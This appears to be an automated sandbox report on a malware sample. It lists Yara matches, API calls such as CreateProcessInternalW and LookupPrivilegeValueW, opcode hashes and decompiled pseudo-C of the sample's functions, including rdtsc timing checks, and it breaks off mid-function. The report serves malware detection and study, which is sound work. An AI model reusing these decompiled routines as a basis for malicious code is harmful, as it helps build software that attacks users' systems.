                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                			E004088A0(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                				char _v24;
                                                                                                                                                                				char _v284;
                                                                                                                                                                				char _v804;
                                                                                                                                                                				char _v840;
                                                                                                                                                                				void* __ebx;
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				void* __ebp;
                                                                                                                                                                				void* _t24;
                                                                                                                                                                				void* _t31;
                                                                                                                                                                				void* _t33;
                                                                                                                                                                				void* _t34;
                                                                                                                                                                				void* _t39;
                                                                                                                                                                				void* _t50;
                                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                                				void* _t53;
                                                                                                                                                                				void* _t54;
                                                                                                                                                                				void* _t55;
                                                                                                                                                                				void* _t56;
                                                                                                                                                                
                                                                                                                                                                				_t52 = _a4;
                                                                                                                                                                				_t39 = 0; // executed
                                                                                                                                                                				_t24 = E00406E00(0, _t52, _t52,  &_v24); // executed
                                                                                                                                                                				_t54 = _t53 + 8;
                                                                                                                                                                				if(_t24 != 0) {
                                                                                                                                                                					E00407010( &_v24,  &_v840);
                                                                                                                                                                					_t55 = _t54 + 8;
                                                                                                                                                                					do {
                                                                                                                                                                						E00419CC0( &_v284, 0x104);
                                                                                                                                                                						E0041A330( &_v284,  &_v804);
                                                                                                                                                                						_t56 = _t55 + 0x10;
                                                                                                                                                                						_t50 = 0x4f;
                                                                                                                                                                						while(1) {
                                                                                                                                                                							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
                                                                                                                                                                							_t56 = _t56 + 0x10;
                                                                                                                                                                							if(_t31 != 0) {
                                                                                                                                                                								break;
                                                                                                                                                                							}
                                                                                                                                                                							_t50 = _t50 + 1;
                                                                                                                                                                							if(_t50 <= 0x62) {
                                                                                                                                                                								continue;
                                                                                                                                                                							} else {
                                                                                                                                                                							}
                                                                                                                                                                							goto L8;
                                                                                                                                                                						}
                                                                                                                                                                						_t9 = _t52 + 0x14; // 0xffffe1b5
                                                                                                                                                                						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                                                                                                                                						_t39 = 1;
                                                                                                                                                                						L8:
                                                                                                                                                                						_t33 = E00407040( &_v24,  &_v840);
                                                                                                                                                                						_t55 = _t56 + 8;
                                                                                                                                                                					} while (_t33 != 0 && _t39 == 0);
                                                                                                                                                                					_t34 = E004070C0(_t52,  &_v24); // executed
                                                                                                                                                                					if(_t39 == 0) {
                                                                                                                                                                						asm("rdtsc");
                                                                                                                                                                						asm("rdtsc");
                                                                                                                                                                						_v8 = _t34 - 0 + _t34;
                                                                                                                                                                						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                                                                                                                                					}
                                                                                                                                                                					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                                                                                                                                					_t20 = _t52 + 0x31; // 0x5608758b
                                                                                                                                                                					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                                                                                                                                					return 1;
                                                                                                                                                                				} else {
                                                                                                                                                                					return _t24;
                                                                                                                                                                				}
                                                                                                                                                                			}






















                                                                                                                                                                0x0040896c
                                                                                                                                                                0x0040896e
                                                                                                                                                                0x00408974
                                                                                                                                                                0x00408978
                                                                                                                                                                0x0040897b
                                                                                                                                                                0x0040897b
                                                                                                                                                                0x00408982
                                                                                                                                                                0x00408985
                                                                                                                                                                0x0040898a
                                                                                                                                                                0x00408997
                                                                                                                                                                0x004088c6
                                                                                                                                                                0x004088c6
                                                                                                                                                                0x004088c6

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                                                                                                                • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                                                                                                                • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                                                                                                                • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                • Opcode ID: bd966df7982c8f4e43f6b4dda9e9ec4006021975d215d172f2752bcf04dc7b40
                                                                                                                                                                • Instruction ID: f6a6b1819d7e9dc7fd280de797c84ab4fc03c2e17297dbdf5c414aadd72d5619
                                                                                                                                                                • Opcode Fuzzy Hash: bd966df7982c8f4e43f6b4dda9e9ec4006021975d215d172f2752bcf04dc7b40
                                                                                                                                                                • Instruction Fuzzy Hash: E41100B2200108AFCB14CF99EC80DEB77A9AF9C354F018249FA0C97241CA30E852CBB4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                			E00407260(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                                				char _v67;
                                                                                                                                                                				char _v68;
                                                                                                                                                                				void* _t12;
                                                                                                                                                                				intOrPtr* _t13;
                                                                                                                                                                				int _t14;
                                                                                                                                                                				long _t22;
                                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                                				void* _t27;
                                                                                                                                                                				void* _t31;
                                                                                                                                                                
                                                                                                                                                                				_t31 = __eflags;
                                                                                                                                                                				_v68 = 0;
                                                                                                                                                                				E00419D10( &_v67, 0, 0x3f);
                                                                                                                                                                				E0041A8F0(__ebx,  &_v68, 3);
                                                                                                                                                                				_t12 = E00409B10(_t31, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                                				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                                                                				_t26 = _t13;
                                                                                                                                                                				if(_t26 != 0) {
                                                                                                                                                                					_t22 = _a8;
                                                                                                                                                                					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                                                                                                                                                					_t33 = _t14;
                                                                                                                                                                					if(_t14 == 0) {
                                                                                                                                                                						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                                                                					}
                                                                                                                                                                					return _t14;
                                                                                                                                                                				}
                                                                                                                                                                				return _t13;
                                                                                                                                                                			}













                                                                                                                                                                APIs
                                                                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                                                                                                • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                                                                                                                • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                                                                                                • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                • Opcode ID: 3c56d27983eda2edee2227fefa9078c4f75da7b95f69b7146e58679842737ae6
                                                                                                                                                                • Instruction ID: 8307bd1499ae008de91b4b1a8a787fffd1737cd02353fd86611252a82453a610
                                                                                                                                                                • Opcode Fuzzy Hash: 3c56d27983eda2edee2227fefa9078c4f75da7b95f69b7146e58679842737ae6
                                                                                                                                                                • Instruction Fuzzy Hash: 22F0AFB16043187FCB20EFA4DC45DEB3B68EF85210F00845AF9485B342DA34E91187F5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                			E0041852D(void* __eax, void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a44, signed char _a48, intOrPtr _a52) {
                                                                                                                                                                				char _v5;
                                                                                                                                                                				signed char _t21;
                                                                                                                                                                				void* _t26;
                                                                                                                                                                				void* _t28;
                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                				void* _t39;
                                                                                                                                                                				void* _t40;
                                                                                                                                                                				intOrPtr* _t41;
                                                                                                                                                                				void* _t43;
                                                                                                                                                                
                                                                                                                                                                				_t28 = __ebx - __ecx;
                                                                                                                                                                				_t19 = _a4;
                                                                                                                                                                				_t41 = _a4 + 0xc80;
                                                                                                                                                                				E00418DB0(_t39, _t19, _t41,  *((intOrPtr*)(_t19 + 0xa14)), 0, 0x37);
                                                                                                                                                                				_t35 = _a52;
                                                                                                                                                                				_t21 = _a48;
                                                                                                                                                                				_t31 = _a44;
                                                                                                                                                                				 *(_t28 - 0x74adeb3c) =  *(_t28 - 0x74adeb3c) ^ _t21;
                                                                                                                                                                				_t26 =  *((intOrPtr*)( *_t41))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t35, _t31,  &_v5, _t40, _t43); // executed
                                                                                                                                                                				return _t26;
                                                                                                                                                                			}














                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                • Opcode ID: 9677f8d018ec6e3977d566ff23e4ea20428135d179658129530337e92df90a3b
                                                                                                                                                                • Instruction ID: d24ee4b4d37115aed461e6ddf82e86eaf883a7d7fa9d013d0385163113724409
                                                                                                                                                                • Opcode Fuzzy Hash: 9677f8d018ec6e3977d566ff23e4ea20428135d179658129530337e92df90a3b
                                                                                                                                                                • Instruction Fuzzy Hash: DE01AFB2211108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241CA30E851CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                			E00418530(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a44, signed char _a48, intOrPtr _a52) {
                                                                                                                                                                				char _v5;
                                                                                                                                                                				signed char _t19;
                                                                                                                                                                				void* _t24;
                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                				void* _t35;
                                                                                                                                                                				intOrPtr* _t36;
                                                                                                                                                                
                                                                                                                                                                				_t17 = _a4;
                                                                                                                                                                				_t36 = _a4 + 0xc80;
                                                                                                                                                                				E00418DB0(_t35, _t17, _t36,  *((intOrPtr*)(_t17 + 0xa14)), 0, 0x37);
                                                                                                                                                                				_t31 = _a52;
                                                                                                                                                                				_t19 = _a48;
                                                                                                                                                                				_t27 = _a44;
                                                                                                                                                                				 *(__ebx - 0x74adeb3c) =  *(__ebx - 0x74adeb3c) ^ _t19;
                                                                                                                                                                				_t24 =  *((intOrPtr*)( *_t36))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t31, _t27,  &_v5); // executed
                                                                                                                                                                				return _t24;
                                                                                                                                                                			}











                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,y@,?,?,?), ref: 00418584
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                                                                                                • Instruction ID: 513559d71bb74bdb0002c37f9039ea76381332b5628ed031e04d017542a4cadc
                                                                                                                                                                • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                                                                                                                                • Instruction Fuzzy Hash: A3015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251DA30E851CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 90%
                                                                                                                                                                			E004184B2(void* __eflags) {
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				void* _t7;
                                                                                                                                                                
                                                                                                                                                                				asm("rol byte [0x418f9a1a], 0xa8");
                                                                                                                                                                				if(__eflags >= 0) {
                                                                                                                                                                					return _t7;
                                                                                                                                                                				} else {
                                                                                                                                                                					__ebp = 0x8b556450;
                                                                                                                                                                					__ebp = __esp;
                                                                                                                                                                					__eax =  *(__ebp + 8);
                                                                                                                                                                					_t3 = __eax + 0xc74; // 0xc74
                                                                                                                                                                					__esi = _t3;
                                                                                                                                                                					__eax =  *(__ebp + 0x10);
                                                                                                                                                                					__eax = RtlFreeHeap( *(__ebp + 0xc),  *(__ebp + 0x10),  *(__ebp + 0x14)); // executed
                                                                                                                                                                					__esi = __esi;
                                                                                                                                                                					__ebp = 0x8b556450;
                                                                                                                                                                					return __eax;
                                                                                                                                                                				}
                                                                                                                                                                			}






                                                                                                                                                                APIs
                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                • Opcode ID: 6caf7123e9a08876ca4bb4410dc58b37d4485cf89a5253c63b7ed200a92544a7
                                                                                                                                                                • Instruction ID: 15caf4c3846399f6af7b9f6682e7d5812ef634fc214158c6e5ae4892ece4b085
                                                                                                                                                                • Opcode Fuzzy Hash: 6caf7123e9a08876ca4bb4410dc58b37d4485cf89a5253c63b7ed200a92544a7
                                                                                                                                                                • Instruction Fuzzy Hash: D5E022B1200204AFDB14EF68DC44EF3376CAF89364F00428AF90C97782DA31E800CBA8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                                				char _t10;
                                                                                                                                                                				void* _t15;
                                                                                                                                                                
                                                                                                                                                                				_t3 = _a4 + 0xc74; // 0xc74
